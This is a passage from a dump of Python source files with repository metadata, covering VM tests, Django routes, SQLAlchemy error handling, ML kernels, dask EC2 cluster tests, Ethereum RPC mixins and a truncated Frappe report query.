] | 2 | 2020-03-12T03:11:28.000Z | 2021-07-26T01:57:58.000Z | '''
New Integration Test for creating KVM VM.
@author: Youyk
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.zstack_test.zstack_test_vm as test_vm_header
import time
import os
vm = None
def test():
    """Create a KVM VM on resources named in the environment, verify it,
    then destroy it and report success to the test framework."""
    global vm

    # Resolve the image and the vlan L3 network configured via environment
    # variables.
    image_uuid = test_lib.lib_get_image_by_name(
        os.environ.get('imageName_s')).uuid
    l3_net_uuid = test_lib.lib_get_l3_by_name(
        os.environ.get('l3VlanNetworkName1')).uuid

    # Use the first instance offering available for user VMs.
    conditions = res_ops.gen_query_conditions('type', '=', 'UserVm')
    instance_offering_uuid = res_ops.query_resource(
        res_ops.INSTANCE_OFFERING, conditions)[0].uuid

    # Assemble the VM creation options.
    creation_option = test_util.VmOption()
    creation_option.set_l3_uuids([l3_net_uuid])
    creation_option.set_image_uuid(image_uuid)
    creation_option.set_instance_offering_uuid(instance_offering_uuid)
    creation_option.set_name('multihost_basic_vm')

    # Create, check, and tear down the VM.
    vm = test_vm_header.ZstackTestVm()
    vm.set_creation_option(creation_option)
    vm.create()
    vm.check()
    vm.destroy()
    test_util.test_pass('Create VM Test Success')
#Will be called only if exception happens in test().
def error_cleanup():
    """Best-effort teardown invoked by the framework when test() raises.

    Destroys the VM created by test(), if any, swallowing cleanup errors
    so the original test failure is not masked.
    """
    global vm
    if vm:
        try:
            vm.destroy()
        # Fixed: narrowed from a bare `except:` so KeyboardInterrupt and
        # SystemExit are no longer swallowed during cleanup.
        except Exception:
            pass
| 31.571429 | 99 | 0.729153 |
4e32c5713fb76a3b051c87d542a8378521a94b25 | 1,103 | py | Python | instaclone/images/urls.py | chois9105/instaclone | 20b1852c05eddf018dcdfffa5a3fc355a70ade9a | [
"MIT"
] | null | null | null | instaclone/images/urls.py | chois9105/instaclone | 20b1852c05eddf018dcdfffa5a3fc355a70ade9a | [
"MIT"
] | null | null | null | instaclone/images/urls.py | chois9105/instaclone | 20b1852c05eddf018dcdfffa5a3fc355a70ade9a | [
"MIT"
] | null | null | null | from django.conf.urls import url
from . import views
# URL routes for the images app. Every route name must be unique within this
# module, otherwise reverse()/{% url %} lookups are ambiguous.
urlpatterns = [
    url(
        regex=r'^$',
        view=views.Feed.as_view(),
        name='feed'
    ),
    url(
        regex=r'^(?P<image_id>[0-9]+)/$',
        view=views.ImageDetail.as_view(),
        name='image_detail'
    ),
    url(
        regex=r'^(?P<image_id>[0-9]+)/likes/$',
        view=views.LikeImage.as_view(),
        name='like_image'
    ),
    url(
        regex=r'^(?P<image_id>[0-9]+)/unlikes/$',
        view=views.UnLikeImage.as_view(),
        name='unlike_image'
    ),
    url(
        regex=r'^(?P<image_id>[0-9]+)/comments/$',
        view=views.CommentOnImage.as_view(),
        name='comment_image'
    ),
    url(
        regex=r'^(?P<image_id>[0-9]+)/comments/(?P<comment_id>[0-9]+)/$',
        view=views.ModerateComments.as_view(),
        # BUG FIX: this route previously reused name='comment_image'.
        # Django resolves a duplicated name to the last pattern registered,
        # so the comment-creation route above was silently shadowed in
        # reverse() lookups. Any caller relying on reverse('comment_image')
        # to reach this moderation URL must switch to 'moderate_comment'.
        name='moderate_comment'
    ),
    url(
        regex=r'^comments/(?P<comment_id>[0-9]+)/$',
        view=views.Comment.as_view(),
        name='comment'
    ),
    url(
        regex=r'^search/$',
        view=views.Search.as_view(),
        name='search'
    )
]
b82a425f683fb8c5aa38a33d70a41d2b007d47e0 | 4,528 | py | Python | flask/models/manager/errors.py | geovote/geovote-main | b848fba73c51c112cdc235f6d5240f5e8706332f | [
"MIT"
] | null | null | null | flask/models/manager/errors.py | geovote/geovote-main | b848fba73c51c112cdc235f6d5240f5e8706332f | [
"MIT"
] | 46 | 2018-12-29T22:30:21.000Z | 2019-02-04T10:47:32.000Z | flask/models/manager/errors.py | geovote/geovote-main | b848fba73c51c112cdc235f6d5240f5e8706332f | [
"MIT"
] | null | null | null | import re
import traceback
from sqlalchemy.exc import DataError
from sqlalchemy import CHAR, \
Column,\
Enum,\
Float,\
Integer,\
String
from models.utils.api_errors import ApiErrors
from utils.logger import logger
# PostgreSQL SQLSTATE codes surfaced by psycopg2 on the wrapped `orig` error.
DUPLICATE_KEY_ERROR_CODE = '23505'
NOT_FOUND_KEY_ERROR_CODE = '23503'
OBLIGATORY_FIELD_ERROR_CODE = '23502'


class Errors():
    """Translate low-level SQLAlchemy/psycopg2 exceptions into user-facing
    ``[field, message]`` pairs, and validate a mapped model instance column
    by column into an ApiErrors accumulator.
    """

    @staticmethod
    def restize_global_error(e):
        # Last-resort handler: log the traceback and return a generic message.
        logger.error("UNHANDLED ERROR : ")
        traceback.print_exc()
        return ["global", "Une erreur technique s'est produite. Elle a été notée, et nous allons investiguer au plus vite."]

    @staticmethod
    def restize_data_error(e):
        # Detect psycopg2 "value too long" errors and surface the column limit.
        first_arg = e.args[0] if e.args and len(e.args) > 0 else None
        if first_arg is not None and first_arg.startswith('(psycopg2.DataError) value too long for type'):
            max_length = re.search('\(psycopg2.DataError\) value too long for type (.*?) varying\((.*?)\)', first_arg, re.IGNORECASE).group(2)
            return ['global', "La valeur d'une entrée est trop longue (max " + max_length + ")"]
        return Errors.restize_global_error(e)

    @staticmethod
    def restize_integrity_error(e):
        # The SQLSTATE code rides on the wrapped driver exception (e.orig).
        pgcode = getattr(getattr(e, 'orig', None), 'pgcode', None)
        if pgcode == DUPLICATE_KEY_ERROR_CODE:
            field = re.search('Key \((.*?)\)=', str(e._message), re.IGNORECASE).group(1)
            return [field, 'Une entrée avec cet identifiant existe déjà dans notre base de données']
        if pgcode == NOT_FOUND_KEY_ERROR_CODE:
            field = re.search('Key \((.*?)\)=', str(e._message), re.IGNORECASE).group(1)
            return [field, 'Aucun objet ne correspond à cet identifiant dans notre base de données']
        if pgcode == OBLIGATORY_FIELD_ERROR_CODE:
            field = re.search('column "(.*?)"', e.orig.pgerror, re.IGNORECASE).group(1)
            return [field, 'Ce champ est obligatoire']
        return Errors.restize_global_error(e)

    @staticmethod
    def restize_type_error(e):
        # TypeErrors raised by model setters carry (msg, kind, field) in args.
        kind = e.args[1] if e.args and len(e.args) > 1 else None
        if kind == 'geography':
            return [e.args[2], 'doit etre une liste de nombre décimaux comme par exemple : [2.22, 3.22]']
        if kind == 'decimal':
            return [e.args[2], 'doit être un nombre décimal']
        if kind == 'integer':
            return [e.args[2], 'doit être un entier']
        return Errors.restize_global_error(e)

    @staticmethod
    def restize_value_error(e):
        # Enum violations carry (msg, 'enum', field, allowed_values) in args.
        if len(e.args) > 1 and e.args[1] == 'enum':
            allowed = ",".join('"' + choice + '"' for choice in e.args[3])
            return [e.args[2], ' doit etre dans cette liste : ' + allowed]
        return Errors.restize_global_error(e)

    def errors(self):
        # Validate every mapped column of this instance; collect user-facing
        # messages into an ApiErrors accumulator and return it.
        api_errors = ApiErrors()
        columns = self.__class__.__table__.columns._data
        for name in columns.keys():
            column = columns[name]
            value = getattr(self, name)
            if not isinstance(column, Column):
                continue
            # Required column: not nullable, not a FK or PK, no default.
            required = (not column.nullable
                        and not column.foreign_keys
                        and not column.primary_key
                        and column.default is None)
            if required and value is None:
                api_errors.addError(name, 'Cette information est obligatoire')
            if value is None:
                continue
            if isinstance(column.type, (CHAR, String)) \
                    and not isinstance(column.type, Enum) \
                    and not isinstance(value, str):
                api_errors.addError(name, 'doit être une chaîne de caractères')
            if isinstance(column.type, (CHAR, String)) \
                    and isinstance(value, str) \
                    and column.type.length \
                    and len(value) > column.type.length:
                api_errors.addError(name,
                                    'Vous devez saisir moins de '
                                    + str(column.type.length)
                                    + ' caractères')
            if isinstance(column.type, Integer) and not isinstance(value, int):
                api_errors.addError(name, 'doit être un entier')
            if isinstance(column.type, Float) and not isinstance(value, float):
                api_errors.addError(name, 'doit être un nombre')
        return api_errors
391dc3258ba2bacf56569912ebfdc8e3dc5d570b | 5,735 | py | Python | public/tgt_files/generate_test_rot.py | sheerkarny/OnPoint | 05f47ef7c9377a1a267ee3cdfa8947a074beb648 | [
"MIT"
] | 19 | 2020-07-03T18:25:48.000Z | 2021-12-10T05:16:06.000Z | public/tgt_files/generate_test_rot.py | sheerkarny/OnPoint | 05f47ef7c9377a1a267ee3cdfa8947a074beb648 | [
"MIT"
] | 1 | 2021-08-03T13:15:46.000Z | 2021-08-24T10:04:47.000Z | public/tgt_files/generate_test_rot.py | sheerkarny/OnPoint | 05f47ef7c9377a1a267ee3cdfa8947a074beb648 | [
"MIT"
] | 4 | 2020-08-25T13:16:41.000Z | 2021-08-18T08:06:45.000Z | """
This script is for generating JSON target files directly, which is the form used in the experiment.
To implement target jump, clamp, or online feedback make appropriate changes in the area flagged by the **TODO** comment.
"""
import json
import random
def generateTargetAngles(numTargets):
    """
    temporary usage of this function for non-evenly spaced targets
    """
    angles = [45, 135]
    if len(angles) != numTargets:
        raise Exception('Target file does not have the right amount of targets. Should have '
                        + str(numTargets) + ' targets, but only has ' + str(len(angles)))
    return angles
def generateJSON(numTargets, movementCycle, cycleDistribution, rotationAngle, targetDistance, numDemoCycles, demoTargetAngle):
    """Build a trial-by-trial target file and write it to 'testShort.json'.

    Args:
        numTargets: number of distinct target angles per cycle.
        movementCycle: total non-demo cycles (one cycle = one reach per target).
        cycleDistribution: 4-entry split of movementCycle into the phases
            [baseline-no-feedback, baseline-feedback, rotation, aftereffect].
        rotationAngle: clamp rotation in degrees (negative = clockwise).
        targetDistance: reach distance written verbatim for every trial.
        numDemoCycles: demo cycles inserted between baseline and rotation.
        demoTargetAngle: fixed target angle (degrees) used for demo trials.

    Side effects: prints every generated field and writes 'testShort.json'
    in the current working directory (hard-coded filename).
    """
    # Ensure non demo cycles add up
    if (movementCycle != sum(cycleDistribution)):
        raise Exception('Number of non demo cycles do not add up. Should have ' + str(movementCycle) + ' cycles, but has ' + str(sum(cycleDistribution)) + '.')
    if (len(cycleDistribution) != 4):
        raise Exception('Incorrect amount of entries in cycle distribution, should have 4 but has ' + str(len(cycleDistribution)) + '.')
    jsonData = {}
    targetAngles = generateTargetAngles(numTargets)
    numTrials = numTargets * movementCycle  # block size
    numDemoTrials = numDemoCycles * numTargets
    totalNumTrials = numTrials + numDemoTrials
    jsonData["numtrials"] = totalNumTrials
    # Per-trial dictionaries keyed by trial index (serialized as strings in JSON).
    trialNums = {}
    aimingLandmarks = {}
    onlineFB = {}
    endpointFB = {}
    rotation = {}
    clampedFB = {}
    tgtDistance = {}
    angles = []
    anglesDict = {}
    betweenBlocks = {}
    targetJump = {}
    # Breakpoints between phases
    base_no_fb = cycleDistribution[0] * numTargets
    base_fb = base_no_fb + (cycleDistribution[1] * numTargets)
    demo = base_fb + numDemoTrials
    rotate = demo + (cycleDistribution[2] * numTargets)
    aftereffect_no_fb = rotate + (cycleDistribution[3] * numTargets)
    if (totalNumTrials != aftereffect_no_fb):
        raise Exception('Number of reaches do not add up. Should have ' + str(totalNumTrials) + ' targets, but only has ' + str(aftereffect_no_fb) + '.')
    # Update the blocks whenever numTrials is changed.
    # **TODO** Update values from 0 --> 1 to toggle effects
    # For target jump, 1 ==> jump to target, any other integer != 0 or 1 ==> jump away from target to that degree
    for i in range(totalNumTrials):
        trialNums[i] = i + 1
        aimingLandmarks[i] = 0
        tgtDistance[i] = targetDistance
        if i < base_no_fb:
            # Baseline, no feedback.
            onlineFB[i] = 0
            endpointFB[i] = 0
            rotation[i] = float(0)
            clampedFB[i] = float(0)
            targetJump[i] = float(0)
        elif i < base_fb:
            # Baseline with online + endpoint feedback.
            onlineFB[i] = 1
            endpointFB[i] = 1
            rotation[i] = float(0)
            clampedFB[i] = float(0)
            targetJump[i] = float(0)
        elif i < demo:
            # Demo trials: clamped rotated feedback.
            onlineFB[i] = 1
            endpointFB[i] = 1
            rotation[i] = float(rotationAngle)
            clampedFB[i] = float(1)
            targetJump[i] = float(0)
        elif i < rotate:
            # Rotation phase: clamped rotated feedback.
            onlineFB[i] = 1
            endpointFB[i] = 1
            rotation[i] = float(rotationAngle)
            clampedFB[i] = float(1)
            targetJump[i] = float(0)
        else:
            # Aftereffect phase: feedback removed again.
            onlineFB[i] = 0
            endpointFB[i] = 0
            rotation[i] = float(0)
            clampedFB[i] = float(0)
            targetJump[i] = float(0)
    # Shuffle the targets once per cycle.
    # NOTE: `angles = targetAngles` aliases the list, so random.shuffle
    # permutes the same list object in place each cycle (intended here).
    for i in range(totalNumTrials):
        if i % numTargets == 0:
            angles = targetAngles
            random.shuffle(angles)
        anglesDict[i] = float(angles[i % len(angles)])
        betweenBlocks[str(i)] = 0.0
    # Set up all demo targets (fixed angle, demo instruction screens before each).
    for i in range(base_fb, demo):
        anglesDict[i] = float(demoTargetAngle)
    for i in range(base_fb - 1, demo - 1):
        betweenBlocks[str(i)] = 6
    # Should automatically be updated by now
    # 1 = baseline feedback instructions
    # 2 = experiment paradigm understanding instructions
    # 3 = after effect no feedback instructions
    # 4 = attention check press 'a'
    # 5 = attention check press 'e'
    # 6 = demo instructions
    betweenBlocks[str(base_no_fb - 1)] = 1
    betweenBlocks[str(demo - 1)] = 2
    betweenBlocks[str(rotate - 1)] = 3
    # Attention check blocks // 5 = press 'a', 4 == press 'e', randomly pick spots before 50 trials, double check with index.js for consistency.
    if (totalNumTrials > 39):
        betweenBlocks[str(6)] = 4
        betweenBlocks[str(14)] = 5
        betweenBlocks[str(24)] = 4
        betweenBlocks[str(39)] = 5
    jsonData["trialnum"] = trialNums
    jsonData["aiming_landmarks"] = aimingLandmarks
    jsonData["online_fb"] = onlineFB
    jsonData["endpoint_feedback"] = endpointFB
    jsonData["rotation"] = rotation
    jsonData["clamped_fb"] = clampedFB
    jsonData["tgt_angle"] = anglesDict
    jsonData["tgt_distance"] = tgtDistance
    jsonData["between_blocks"] = betweenBlocks
    jsonData["target_jump"] = targetJump
    # Dump every field for manual inspection.
    for key in jsonData.keys():
        print ("key: ", key)
        print ("value: ", jsonData[key])
        print ("")
    # NOTE(review): output filename is hard-coded; consider parameterizing.
    with open('testShort.json', 'w') as outfile:
        json.dump(jsonData, outfile)
# Module-level driver: builds one target file.
# NOTE(review): this runs on *import* as well as when executed as a script;
# consider wrapping in `if __name__ == "__main__":` — confirm nothing relies
# on the import-time side effect first.
nonDemoCycles = [2, 2, 2, 2]
generateJSON(2, 8, nonDemoCycles, -10, 80, 2, 270)
"""
The above call 'generateJSON(2, 8, nonDemoCycles, -10, 80, 2, 270)' will generate a target file with:
- 2 targets
- 8 cycles (8 x 2 = 16 reaches) distributed into cycles of 2 (split by nonDemoCycles)
- -10 rotation angle (10 degrees clockwise)
- TargetDistance is not obsolete
- 2 demo trials at 270 degrees (straight down)
"""
9d39c1a59ac8fb7a5b633f9fc332e02a3fd1ec8b | 1,818 | py | Python | launch/test/launch/launch_description_source/test_python_launch_description_source.py | bedieber/launch | 4dfe69763379e405df7a21bde536aad7e39fdd93 | [
"Apache-2.0"
] | 67 | 2015-06-12T21:17:24.000Z | 2022-03-30T07:19:52.000Z | launch/test/launch/launch_description_source/test_python_launch_description_source.py | bedieber/launch | 4dfe69763379e405df7a21bde536aad7e39fdd93 | [
"Apache-2.0"
] | 516 | 2015-03-20T02:22:59.000Z | 2022-03-30T12:33:33.000Z | launch/test/launch/launch_description_source/test_python_launch_description_source.py | bedieber/launch | 4dfe69763379e405df7a21bde536aad7e39fdd93 | [
"Apache-2.0"
] | 101 | 2016-01-12T16:56:54.000Z | 2022-03-09T12:35:37.000Z | # Copyright 2018 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the PythonLaunchDescriptionSource class."""
import os
from launch import LaunchContext
from launch.launch_description_sources import InvalidPythonLaunchFileError
from launch.launch_description_sources import PythonLaunchDescriptionSource
import pytest
def test_python_launch_description_source():
    """Test the PythonLaunchDescriptionSource class."""
    this_dir = os.path.dirname(os.path.abspath(__file__))
    launch_file = os.path.join(this_dir, 'simple.launch.py')

    # A valid python launch file loads and yields an empty description.
    source = PythonLaunchDescriptionSource(launch_file)
    assert 'python launch file' in source.method
    assert 'launch.substitutions.text_substitution.TextSubstitution' in source.location
    description = source.get_launch_description(LaunchContext())
    assert source.location == launch_file
    assert len(description.entities) == 0

    # A loadable module that is not a launch file must be rejected.
    with pytest.raises(InvalidPythonLaunchFileError):
        bad_source = PythonLaunchDescriptionSource(
            os.path.join(this_dir, 'loadable_python_module.py'))
        bad_source.get_launch_description(LaunchContext())

    # A missing path must surface as FileNotFoundError.
    with pytest.raises(FileNotFoundError):
        missing_source = PythonLaunchDescriptionSource('does_not_exist')
        missing_source.get_launch_description(LaunchContext())
8d43cfae5bc4d8f65a0d7c4049c3873d08ddca11 | 2,008 | py | Python | Kernels.py | HamzaG737/Kmml-challenge-code | c7ae3e26a7e02e4951758c683f29c23c2ab9b3e4 | [
"MIT"
] | null | null | null | Kernels.py | HamzaG737/Kmml-challenge-code | c7ae3e26a7e02e4951758c683f29c23c2ab9b3e4 | [
"MIT"
] | null | null | null | Kernels.py | HamzaG737/Kmml-challenge-code | c7ae3e26a7e02e4951758c683f29c23c2ab9b3e4 | [
"MIT"
] | null | null | null | import numpy as np
from tqdm import tqdm
class Kernel:
    """
    Factory for kernel functions k(x, y).

    Supported kernels (selected by name):
      - "linear":     <x, y>
      - "rbf":        exp(-gamma * ||x - y||^2)
      - "polynomial": (gamma * (offset + <x, y>)) ** deg
      - "gaussian":   exp(-||x - y||^2 / (2 * sigma^2))
      - "spectrum":   sparse inner product between dicts mapping k-mer id -> count

    The selected callable is exposed as ``self.kfunction``.
    """

    def __init__(self, kernel="spectrum", gamma=0.1, deg=None, sigma=5.0, offset=0.0):
        self.kernel = kernel
        self.gamma = gamma
        self.deg = deg
        self.sigma = sigma
        self.offset = offset
        self.kfunction = self.kernel_function(kernel)

    def kernel_function(self, kernel):
        """Return the kernel callable named by ``kernel``.

        Raises:
            ValueError: for an unknown kernel name. (The original silently
                returned None, which only failed later with an opaque
                "'NoneType' object is not callable".)
        """
        if kernel == "linear":
            def f(x, y):
                return np.inner(x, y)
            return f
        # Radial Basis Function
        elif kernel == "rbf":
            def f(x, y):
                return np.exp(-self.gamma * (np.linalg.norm(x - y) ** 2))
            return f
        elif kernel == "polynomial":
            def f(x, y):
                return (self.gamma * (self.offset + np.dot(x, y))) ** self.deg
            return f
        elif kernel == "gaussian":
            def f(x, y):
                # BUGFIX: original called the bare name `linalg` (NameError);
                # the norm lives in `np.linalg`.
                return np.exp(-np.linalg.norm(x - y) ** 2 / (2 * (self.sigma ** 2)))
            return f
        elif kernel == "spectrum":
            def f(x, y):
                # Sparse dot product over the keys present in both dicts.
                inner = 0
                for id_ in x:
                    if id_ in y:
                        inner += x[id_] * y[id_]
                return inner
            return f
        raise ValueError("Unknown kernel: " + repr(kernel))

    def compute_gram_matrix(self, X):
        """Return the symmetric n x n Gram matrix K[i, j] = k(X[i], X[j])."""
        n = len(X)
        K = np.zeros((n, n))
        for i in tqdm(range(n)):
            # The kernel is symmetric: compute the lower triangle and mirror.
            for j in range(i + 1):
                prod_scal = self.kfunction(X[i], X[j])
                K[i, j] = prod_scal
                K[j, i] = prod_scal
        return K
def get_gram_cross(X_train, X_val, kernel="spectrum"):
    """
    get pairwise kernel evaluations between train and val/test.
    """
    ker = Kernel(kernel=kernel)
    gram_cross = np.zeros((len(X_train), len(X_val)))
    for row, x_tr in enumerate(tqdm(X_train)):
        for col, x_va in enumerate(X_val):
            gram_cross[row, col] = ker.kfunction(x_tr, x_va)
    return gram_cross
e15c3fe270796adbf0cf971573771fae821e3d07 | 5,600 | py | Python | dask_cloudprovider/aws/tests/test_ec2.py | heiqs/dask-cloudprovider | 093af2fe8156e3e6b51c68c108f35e1d7855977d | [
"BSD-3-Clause"
] | null | null | null | dask_cloudprovider/aws/tests/test_ec2.py | heiqs/dask-cloudprovider | 093af2fe8156e3e6b51c68c108f35e1d7855977d | [
"BSD-3-Clause"
] | null | null | null | dask_cloudprovider/aws/tests/test_ec2.py | heiqs/dask-cloudprovider | 093af2fe8156e3e6b51c68c108f35e1d7855977d | [
"BSD-3-Clause"
] | null | null | null | import pytest
aiobotocore = pytest.importorskip("aiobotocore")
from dask_cloudprovider.aws.ec2 import EC2Cluster
from dask_cloudprovider.aws.helper import get_latest_ami_id
from dask.distributed import Client
from distributed.core import Status
async def skip_without_credentials():
    # Probe AWS STS with the ambient credentials; any failure means the
    # integration tests below cannot run, so skip instead of erroring.
    try:
        async with aiobotocore.get_session().create_client("sts") as client:
            await client.get_caller_identity()
    except Exception:
        pytest.skip(
            """
            You must configure Your AWS credentials to run this test.

                $ aws configure

            """
        )


@pytest.fixture
async def cluster():
    # Default EC2Cluster; the async context manager tears the cluster down
    # when the fixture goes out of scope.
    await skip_without_credentials()
    async with EC2Cluster(asynchronous=True) as cluster:
        yield cluster


@pytest.fixture
async def cluster_sync():
    # Synchronous-API cluster variant.
    # NOTE(review): unlike the other fixtures this one is never closed
    # (no `with` / explicit close after yield), so EC2 instances may be
    # leaked after the test — verify teardown happens elsewhere.
    await skip_without_credentials()
    cluster = EC2Cluster()
    yield cluster


@pytest.fixture
async def cluster_rapids():
    # GPU cluster on a stock Deep Learning AMI running the RAPIDS image.
    await skip_without_credentials()
    async with EC2Cluster(
        asynchronous=True,
        # Deep Learning AMI (Ubuntu 18.04)
        ami="ami-0c7c7d78f752f8f17",
        # Python version must match local version and CUDA version must match AMI CUDA version
        docker_image="rapidsai/rapidsai:cuda10.1-runtime-ubuntu18.04-py3.8",
        instance_type="p3.2xlarge",
        bootstrap=False,
        filesystem_size=120,
    ) as cluster:
        yield cluster


@pytest.fixture
async def cluster_rapids_packer():
    # Same as cluster_rapids, but using a pre-baked Packer AMI.
    await skip_without_credentials()
    async with EC2Cluster(
        asynchronous=True,
        # Packer AMI
        ami="ami-04e5539cb82859e69",
        # Python version must match local version and CUDA version must match AMI CUDA version
        docker_image="rapidsai/rapidsai:cuda10.1-runtime-ubuntu18.04-py3.8",
        instance_type="p3.2xlarge",
        bootstrap=False,
        filesystem_size=120,
    ) as cluster:
        yield cluster


@pytest.fixture
async def cluster_packer():
    # CPU cluster from a pre-baked Packer AMI (no bootstrap needed).
    await skip_without_credentials()
    async with EC2Cluster(
        asynchronous=True, ami="ami-0e6187593ace05a0c", bootstrap=False
    ) as cluster:
        yield cluster


@pytest.fixture
async def ec2_client():
    # Raw aiobotocore EC2 client, for AMI lookups etc.
    await skip_without_credentials()
    async with aiobotocore.get_session().create_client("ec2") as client:
        yield client
@pytest.mark.asyncio
async def test_init():
    # Constructing asynchronously must not start anything yet.
    cluster = EC2Cluster(asynchronous=True)
    assert cluster.status == Status.created


@pytest.mark.asyncio
@pytest.mark.timeout(600)
async def test_create_cluster(cluster):
    # Scale to two workers and round-trip a trivial task through the cluster.
    assert cluster.status == Status.running

    cluster.scale(2)
    await cluster
    assert len(cluster.workers) == 2

    async with Client(cluster, asynchronous=True) as client:
        inc = lambda x: x + 1
        assert await client.submit(inc, 10).result() == 11


@pytest.mark.asyncio
@pytest.mark.timeout(600)
async def test_create_cluster_sync(cluster_sync):
    # Same round-trip via the synchronous client API.
    assert cluster_sync.status == Status.running

    cluster_sync.scale(2)

    with Client(cluster_sync) as client:
        inc = lambda x: x + 1
        assert client.submit(inc, 10).result() == 11


@pytest.mark.asyncio
@pytest.mark.timeout(600)
async def test_create_cluster_with_packer(cluster_packer):
    # Pre-baked AMI path: workers must come up without bootstrapping.
    assert cluster_packer.status == Status.running

    cluster_packer.scale(2)
    await cluster_packer
    assert len(cluster_packer.workers) == 2

    async with Client(cluster_packer, asynchronous=True) as client:
        inc = lambda x: x + 1
        assert await client.submit(inc, 10).result() == 11


@pytest.mark.asyncio
@pytest.mark.timeout(1200)
async def test_create_rapids_cluster(cluster_rapids):
    # GPU smoke test: a cupy computation must run on the single worker.
    assert cluster_rapids.status == Status.running

    cluster_rapids.scale(1)
    await cluster_rapids
    assert len(cluster_rapids.workers) == 1

    async with Client(cluster_rapids, asynchronous=True) as client:

        def f():
            import cupy

            return float(cupy.random.random(100).mean())

        assert await client.submit(f).result() < 1


@pytest.mark.asyncio
@pytest.mark.timeout(1200)
async def test_create_rapids_cluster_with_packer(cluster_rapids_packer):
    # Same GPU smoke test on the Packer-built RAPIDS AMI.
    assert cluster_rapids_packer.status == Status.running

    cluster_rapids_packer.scale(1)
    await cluster_rapids_packer
    assert len(cluster_rapids_packer.workers) == 1

    async with Client(cluster_rapids_packer, asynchronous=True) as client:

        def f():
            import cupy

            return float(cupy.random.random(100).mean())

        assert await client.submit(f).result() < 1
@pytest.mark.asyncio
async def test_get_ubuntu_image(ec2_client):
    # Latest Canonical Ubuntu 20.04 AMI lookup must return an AMI id.
    image = await get_latest_ami_id(
        ec2_client,
        "ubuntu/images/hvm-ssd/ubuntu-focal-20.04-amd64-server-*",
        "099720109477",  # Canonical
    )
    assert "ami-" in image


@pytest.mark.asyncio
async def test_get_cloud_init():
    # Env vars and docker args must be threaded into the cloud-init script.
    cloud_init = EC2Cluster.get_cloud_init(
        env_vars={"EXTRA_PIP_PACKAGES": "s3fs"},
        docker_args="--privileged",
    )
    assert "systemctl start docker" in cloud_init
    assert " -e EXTRA_PIP_PACKAGES=s3fs " in cloud_init
    assert " --privileged " in cloud_init


@pytest.mark.asyncio
async def test_get_cloud_init_rapids():
    # RAPIDS configuration must select the rapidsai docker image.
    cloud_init = EC2Cluster.get_cloud_init(
        # Deep Learning AMI (Ubuntu 18.04)
        ami="ami-0c7c7d78f752f8f17",
        # Python version must match local version and CUDA version must match AMI CUDA version
        docker_image="rapidsai/rapidsai:cuda10.1-runtime-ubuntu18.04-py3.8",
        instance_type="p3.2xlarge",
        bootstrap=False,
        filesystem_size=120,
    )
    assert "rapidsai" in cloud_init
4d2a70059a923a62f84cc544134dae80ddba9b24 | 650 | py | Python | aioethereum/management/__init__.py | h8is2w8/aioethereum | eb23e28068c34cda28bbef45c3f288d16936d88e | [
"MIT"
] | 16 | 2017-10-04T17:44:51.000Z | 2021-03-07T12:55:04.000Z | aioethereum/management/__init__.py | h8is2w8/aioethereum | eb23e28068c34cda28bbef45c3f288d16936d88e | [
"MIT"
] | 8 | 2017-10-04T22:53:08.000Z | 2021-01-15T18:04:41.000Z | aioethereum/management/__init__.py | h8is2w8/aioethereum | eb23e28068c34cda28bbef45c3f288d16936d88e | [
"MIT"
] | 5 | 2018-02-22T15:56:34.000Z | 2021-01-03T21:25:22.000Z | from .admin import AdminMixin
from .db import DbMixin
from .debug import DebugMixin
from .eth import EthMixin
from .miner import MinerMixin
from .net import NetMixin
from .personal import PersonalMixin
from .shh import ShhMixin
from .txpool import TxpoolMixin
from .web3 import Web3Mixin
# Public API of the management subpackage: each mixin implements one
# JSON-RPC namespace (admin_*, db_*, eth_*, ...); RpcMixin aggregates them.
__all__ = [
    'AdminMixin',
    'DbMixin',
    'DebugMixin',
    'EthMixin',
    'MinerMixin',
    'NetMixin',
    'PersonalMixin',
    'ShhMixin',
    'TxpoolMixin',
    'Web3Mixin',
    'RpcMixin',
]


class RpcMixin(AdminMixin, DbMixin, DebugMixin, EthMixin, MinerMixin,
               NetMixin, PersonalMixin, ShhMixin, TxpoolMixin, Web3Mixin):
    # Aggregate mixin exposing every RPC namespace on a single client class.
    pass
05f6887dfe6aab30c2a085e775c15cb296d95efa | 3,644 | py | Python | siqbal/siqbal/report/delivery_status_salesman/delivery_status_salesman.py | smehata/siqbal | 8b6a21fb63c050237593c49757065198c0e2c54a | [
"MIT"
] | 1 | 2021-08-07T12:48:02.000Z | 2021-08-07T12:48:02.000Z | siqbal/siqbal/report/delivery_status_salesman/delivery_status_salesman.py | smehata/siqbal | 8b6a21fb63c050237593c49757065198c0e2c54a | [
"MIT"
] | null | null | null | siqbal/siqbal/report/delivery_status_salesman/delivery_status_salesman.py | smehata/siqbal | 8b6a21fb63c050237593c49757065198c0e2c54a | [
"MIT"
] | 4 | 2021-01-16T06:14:58.000Z | 2022-02-07T06:36:41.000Z | # Copyright (c) 2013, RC and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
def execute(filters=None):
    """Frappe report entry point: return (columns, data) for the filters."""
    filters = filters or {}
    return get_columns(), get_data(filters)
def get_data(filters):
    """Fetch one row per sales-order item with ordered / requested /
    transferred / invoiced quantities joined from Material Requests,
    Stock Entries and Sales Invoices.

    Mutates `filters` in place by adding the session user, then passes it as
    the parameter dict to frappe.db.sql.
    """
    user = frappe.session.user
    filters["user"] = user
    conditions = ""
    roles = frappe.get_roles(user)
    if filters.company:
        conditions += "and so.company = %(company)s"
    # Salesmen only see their own orders.
    if "Salesman TC" in roles:
        conditions += " and so.owner = %(user)s"
    # NOTE(review): the query uses `%(from_date) s` (space before the `s`
    # conversion). The space is a legal printf flag so this still binds the
    # parameter, but `%(from_date)s` is the conventional spelling — confirm
    # before normalizing. `%%` inside LIKE patterns escapes a literal `%`.
    sos = frappe.db.sql("""
		select so.name, so.owner, so.customer_name, so.transaction_date, soi.item_code, soi.item_name, soi.qty, soi.boxes, soi.pieces,
		mr.qty, mr.boxes, mr.pieces, if(sed.docstatus = 1, 'Submitted', 'Pending'), sed.qty, sed.boxes, sed.pieces, si.qty,
